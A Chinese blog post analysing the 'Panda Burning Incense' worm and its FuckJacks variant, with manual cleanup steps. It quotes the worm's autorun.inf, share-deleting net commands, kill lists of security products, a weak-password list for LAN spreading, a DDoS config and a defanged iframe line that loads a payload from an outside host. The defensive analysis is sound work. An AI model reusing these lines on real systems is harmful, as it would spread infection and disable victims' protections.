`
cafard.cn
  • 浏览: 78825 次
  • 性别: Icon_minigender_1
  • 来自: 上海
文章分类
社区版块
存档分类
最新评论

熊猫烧香简单分析

阅读更多

       还记的哪个酣态可鞠的熊猫,他让我们哭笑不的,网络上对这个病毒的分析、对作者猜测的文章多如牛毛,通过和他打交道,我感觉这个病毒的破坏性并不大,并且病毒本身也不具有什么先进的技术,关键是他的传播能力,他几乎采用了所有的病毒传播方式,一时间天下大乱,无人不知“熊猫烧香”
    许多前辈通过DB发现病毒代码中有“whboy”字样,于是有了“武汉男生”这个名字,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
  下面我主要结合实践说一下熊猫烧香病毒的手动清除方案。主要讲讲病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方法
   
一:病毒进程为“spoclsv.exe”
  这是“熊猫烧香”早期变种之一,特别之处是“杀死杀毒软件”,最恶劣之处在于感染全盘.exe文件和删除.gho文件(Ghost的镜像文件)。最牛的一招是在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码,且一定要清除。否则访问了有此代码的网页,又会感染。

  以下是熊猫烧香病毒详细行为:
 
  1.复制自身到系统目录下:

  %System%\drivers\spoclsv.exe(“%System%”代表Windows所在目录,比如:C:\Windows(xp系统))

  不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。

  2.创建启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "svcshare"="%System%\drivers\spoclsv.exe"

  3.在各分区根目录生成病毒副本:
  X:\setup.exe
  X:\autorun.inf

  autorun.inf内容:

  [AutoRun]
  OPEN=setup.exe
  shellexecute=setup.exe
  shell\Auto\command=setup.exe

  4.使用net share命令关闭管理共享:

  cmd.exe /c net share X$ /del /y
  cmd.exe /c net share admin$ /del /y

  5.修改“显示所有文件和文件夹”设置:

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
  \Explorer\Advanced\Folder\Hidden\SHOWALL]
  "CheckedValue"=dword:00000000

  6.熊猫烧香病毒尝试关闭安全软件相关窗口:

  天网
  防火墙
  进程
  VirusScan
  NOD32
  网镖
  杀毒
  毒霸
  瑞星
  江民
  黄山IE
  超级兔子
  优化大师
  木马清道夫
  木馬清道夫
  QQ病毒
  注册表编辑器
  系统配置实用程序
  卡巴斯基反病毒
  Symantec AntiVirus
  Duba
  Windows 任务管理器
  esteem procs
  绿鹰PC
  密码防盗
  噬菌体
  木马辅助查找器
  System Safety Monitor
  Wrapped gift Killer
  Winsock Expert
  游戏木马检测大师
  超级巡警
  msctls_statusbar32
  pjf(ustc)
  IceSword

  7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程:

  Mcshield.exe
  VsTskMgr.exe
  naPrdMgr.exe
  UpdaterUI.exe
  TBMon.exe
  scan32.exe
  Ravmond.exe
  CCenter.exe
  RavTask.exe
  Rav.exe
  Ravmon.exe
  RavmonD.exe
  RavStub.exe
  KVXP.kxp
  KvMonXP.kxp
  KVCenter.kxp
  KVSrvXP.exe
  KRegEx.exe
  UIHost.exe
  TrojDie.kxp
  FrogAgent.exe
  Logo1_.exe
  Logo_1.exe
  Rundl132.exe

  8.禁用安全软件相关服务:

  Schedule
  sharedaccess
  RsCCenter
  RsRavMon
  KVWSC
  KVSrvXP
  kavsvc
  AVP
  McAfeeFramework
  McShield
  McTaskManager
  navapsvc
  wscsvc
  KPfwSvc
  SNDSrvc
  ccProxy
  ccEvtMgr
  ccSetMgr
  SPBBCSvc
  Symantec Core LC
  NPFMntor
  MskService
  FireSvc

  9.删除安全软件相关启动项:

  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

  10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:

  <iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

  但不修改以下目录中的网页文件:

  C:\WINDOWS
  C:\WINNT
  C:\system32
  C:\Documents and Settings
  C:\System Volume Information
  C:\Recycled
  Program Files\Windows NT
  Program Files\WindowsUpdate
  Program Files\Windows Media Player
  Program Files\Outlook Express
  Program Files\Internet Explorer
  Program Files\NetMeeting
  Program Files\Common Files
  Program Files\ComPlus Applications
  Program Files\Messenger
  Program Files\InstallShield Installation Information
  Program Files\MSN
  Program Files\Microsoft Frontpage
  Program Files\Movie Maker
  Program Files\MSN Gamin Zone

  11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。

  12.此外,病毒还会尝试删除GHO文件。

  病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
  password
  harley
  golf
  pussy
  mustang
  shadow
  fish
  qwerty
  baseball
  letmein
  ccc
  admin
  abc
  pass
  passwd
  database
  abcd
  abc123
  sybase
  123qwe
  server
  computer
  super
  123asd
  ihavenopass
  godblessyou
  enable
  alpha
  1234qwer
  123abc
  aaa
  patrick
  pat
  administrator
  root
  sex
  god
  fuckyou
  fuck
  test
  test123
  temp
  temp123
  win
  asdf
  pwd
  qwer
  yxcv
  zxcv
  home
  xxx
  owner
  login
  Login
  love
  mypc
  mypc123
  admin123
  mypass
  mypass123
  Administrator
  Guest
  admin
  Root

  病毒文件内含有这些信息:

  whboy
  ***武*汉*男*生*感*染*下*载*者***

  解决方法:

  1. 结束病毒进程:

  %System%\drivers\spoclsv.exe

  不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。

  “%System%\system32\spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)

  查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。

  2. 删除病毒文件:

  %System%\drivers\spoclsv.exe

  请注意区分病毒和系统文件。详见步骤1。

  3. 删除病毒启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "svcshare"="%System%\drivers\spoclsv.exe"

  4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:

  X:\setup.exe
  X:\autorun.inf

  5. 恢复被修改的“显示所有文件和文件夹”设置:

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
  \Explorer\Advanced\Folder\Hidden\SHOWALL]
  "CheckedValue"=dword:00000001

  6. 修复或重新安装被破坏的安全软件。

  7.修复被感染的程序。可用专杀工具进行修复.我用的当然是我们老大做的专杀了。呵呵。

  8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。


熊猫烧香病毒变种二:病毒进程为“FuckJacks.exe”


  病毒描述:

  含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。

  病毒基本情况:

  [文件信息]

  病毒名: Virus.Win32.EvilPanda.a.ex$
  大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
  SHA1  : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
  壳信息: 未知
  危害级别:高

  病毒名: Flooder.Win32.FloodBots.a.ex$
  大  小: 0xE800 (59392), (disk) 0xE800 (59392)
  SHA1  : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
  壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
  危害级别:高

  病毒行为:

  Virus.Win32.EvilPanda.a.ex$ :

  1、病毒体执行后,将自身拷贝到系统目录:

  %SystemRoot%\system32\FuckJacks.exe
  
  2、添加注册表启动项目确保自身在系统重启动后被加载:

  键路径:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  键名:FuckJacks
  键值:"C:WINDOWS\system32\FuckJacks.exe"

  键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  键名:svohost
  键值:"C:WINDOWS\system32\FuckJacks.exe"

  3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。

  C:autorun.inf    1KB    RHS
  C:setup.exe    230KB    RHS

  4、关闭众多杀毒软件和安全工具。

  5、连接*****.3322.org下载某文件,并根据该文件记录的地址,去www.****.com下载某ddos程序,下载成功后执行该程序。

  6、刷新bbs.qq.com,某QQ秀链接。

  7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Windows媒体播放器、MSN、IE 等程序。

  Flooder.Win32.FloodBots.a.ex$ :

  1、病毒体执行后,将自身拷贝到系统目录:

  %SystemRoot%\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
  %SystemRoot%\system32\SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)

  2、该病毒后下载运行后,添加注册表启动项目确保自身在系统重启动后被加载:

  键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  键名:Userinit
  键值:"C:WINDOWS\system32\SVCH0ST.exe"

  3、连接ddos2.****.com,获取攻击地址列表和攻击配置,并根据配置文件,进行相应的攻击。

  配置文件如下:

  www。victim.net:3389
  www。victim.net:80
  www。victim.com:80
  www。victim.net:80
  1
  1
  120
  50000  

  解决方案:

  1. 断开网络

  2. 结束病毒进程:%System%\FuckJacks.exe

  3. 删除病毒文件:%System%\FuckJacks.exe

  4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:

  X:\autorun.inf
  X:\setup.exe

  5. 删除病毒创建的启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "FuckJacks"="%System%\FuckJacks.exe"

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "svohost"="%System%\FuckJacks.exe"

  6. 修复或重新安装反病毒软件

  7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。

  手动恢复中毒文件(在虚拟机上通过测试,供参考)

  1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件,即执行之前的步骤1、2、4、5。

  2.打开“运行”输入“gpedit.msc”打开组策略-本地计算机策略-windows设置-安全设置-软件限制策略-其它规则。在其它规则上右键选择-新散列规则-打开新散列规则窗口

  3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择-不允许的。确定后重启。

  4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)。

  5.双击运行被感染的程序已经恢复原来样子了。全部回复后,用SREng把FuckJacks.exe在注册表里的启动项删除即可!
   好了,到这里我就写完了,病毒的分析重要结合了一些别人的现成东东,多谢了。但现在变种已经400多了,希望大家多多指教,多交流。

分享到:
评论

相关推荐

    熊猫烧香分析报告.pdf

    小白学分析,找了一个比较经典和简单的病毒进行学习,将报告...“熊猫烧香”虽然是一个很老的病毒,并且里面的手段也比较简单,但是对于初学者像我这样的小白来说,还是挺适合练手的,毕竟也是一个名气很大的传统病毒。

    自己写的带有菜单的WinMain函数

    通过分析和学习这个代码,我们可以更深入地理解如何在实际项目中应用这些概念。 总之,"带有菜单的WinMain函数"是一个典型的WIN32应用程序示例,它演示了如何利用Windows API创建一个用户界面,并通过菜单与用户...

    挂马网站分析追溯技术与实践

    书中详细分析了两个著名的案件——“证券大盗”和“熊猫烧香”。前者通过网络钓鱼和网页木马,成功窃取了股民的股票账户,非法获利;后者则利用病毒编写、网站挂马和信封窃取等一系列操作,形成了一个完整的网络虚拟...

    网络安全培训视频教程-55.上传漏洞形成原因分析.rar

    2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...

    网络安全培训视频教程-18.日志分析及如何清除.rar

    2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...

    2007年上半年系统分析师下午题2.pdf

    - **恶意软件识别**:“熊猫烧香”是一种网络蠕虫病毒,感染该病毒后,可能会导致用户的执行文件图标变成熊猫烧香图案,同时还会减慢系统运行速度和泄露用户信息,但并不会直接破坏计算机硬件。 ##### 3. 知识产权...

    2007年数据库系统工程师上午试卷.pdf

    9. 计算机病毒影响:"熊猫烧香"是一种著名的计算机病毒,但选项(9)C表示的向多个邮箱群发邮件不是其典型症状。感染熊猫烧香的计算机可能会出现文件扩展名被改变、系统运行缓慢等现象,而不是群发邮件。 以上知识...

    计算机网络信息安全及病毒常识教学设计.doc

    通过实际案例,如熊猫烧香、米开朗基罗或木马病毒,学生能够更加深入地了解病毒的具体特征和行为模式。 课堂上的互动环节对于学生理解病毒的影响至关重要。教师可以列出一系列由病毒引起的现象,比如系统死机、速度...

    2017年自贡市公需科目《大数据时代的互联网信息安全》考试题及答案.pdf

    计算机安全阶段,如第二题所述,安全操作系统设计技术是主要的保护措施,用于抵挡恶意软件的侵袭,如"熊猫烧香"这样的蠕虫病毒。 大数据分析的最佳实践是利用优化的分析模型,这有助于提高数据处理效率和精准度。...

    专业技术人员 互联网监管与网络道德建设(继续教育全).doc

    例如,"熊猫烧香"病毒是我国首例被破获的电脑病毒制作案,提醒我们必须提高对网络安全威胁的警觉性。 2008年5月1日,我国正式实施《政府信息公开条例》,这是政府改革的重要举措,旨在促进政务透明度,提高政府服务...

    2017年自贡市公需科目大数据时代的互联网信息安全-考试题及答案.docx

    熊猫烧香病毒是历史上著名的蠕虫病毒,提醒人们需要时刻警惕网络安全。信息安全关乎国家利益,因此需要全面综合的管理策略。智慧城市不仅需要宽带网络,还需要包括安全在内的多个层面的支持。手机病毒和PC病毒虽然有...

    易语言源码100个1.zip

    2. **1熊猫烧香--搞恶.e**:从名字上看,这可能是一个模拟病毒或恶意软件的示例,用于教学目的,让大家了解如何防止和处理这类程序。 3. **able_绘树.e**:这个源码可能涉及数据结构中的树形结构,教授如何在易语言...

    中级嵌入式系统设计师2014下半年上午试题与答案解析

    9. 冰河是一种远程控制软件,而不是蠕虫病毒,熊猫烧香、红色代码和爱虫病毒都是知名的蠕虫病毒。 10. 委托开发的软件,如果没有书面合同,一般由开发者(甲公司)享有著作权。 11. 在商标注册冲突情况下,若双方都...

    数据结构_综合性课程设计教学探索与实践

    - **启发式教学:** 提供有多种解决方案的题目,鼓励学生自行探索最优解法,如“熊猫烧香”问题,可以通过不同的算法实现,包括广度优先搜索、Dijkstra算法和并查集等。 ##### 2. 实施方法 - **分组合作:** 将...

    2007年上半年软件设计师上午试卷

    【知识点9】“熊猫烧香”病毒会感染系统,修改文件图标,使系统运行变慢,甚至可能导致用户信息泄露。但是,它不会直接破坏计算机主板,而是影响软件层面。 【知识点10】根据专利法,当有多人就同样的发明创造申请...

    网络安全论文3000字.docx

    早在本世纪初,熊猫烧香的出现已经让广大用户欲哭无泪,随后今年的Wannacry的强大也让广大用户见识了计算机病毒的威力。计算机病毒作为引起现代计算机安全问题的主要因素,必须引起用户的重点关注。 2.3黑客攻击 ...

    网络安全手册.docx

    立即关闭自动播放功能,自动播放大大增加了感染病毒的风险,熊猫烧香病毒 很多是通过插入U盘这样一个简单的动作入侵系统的。关闭方法:步骤:单击开始, 运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置...

Global site tag (gtag.js) - Google Analytics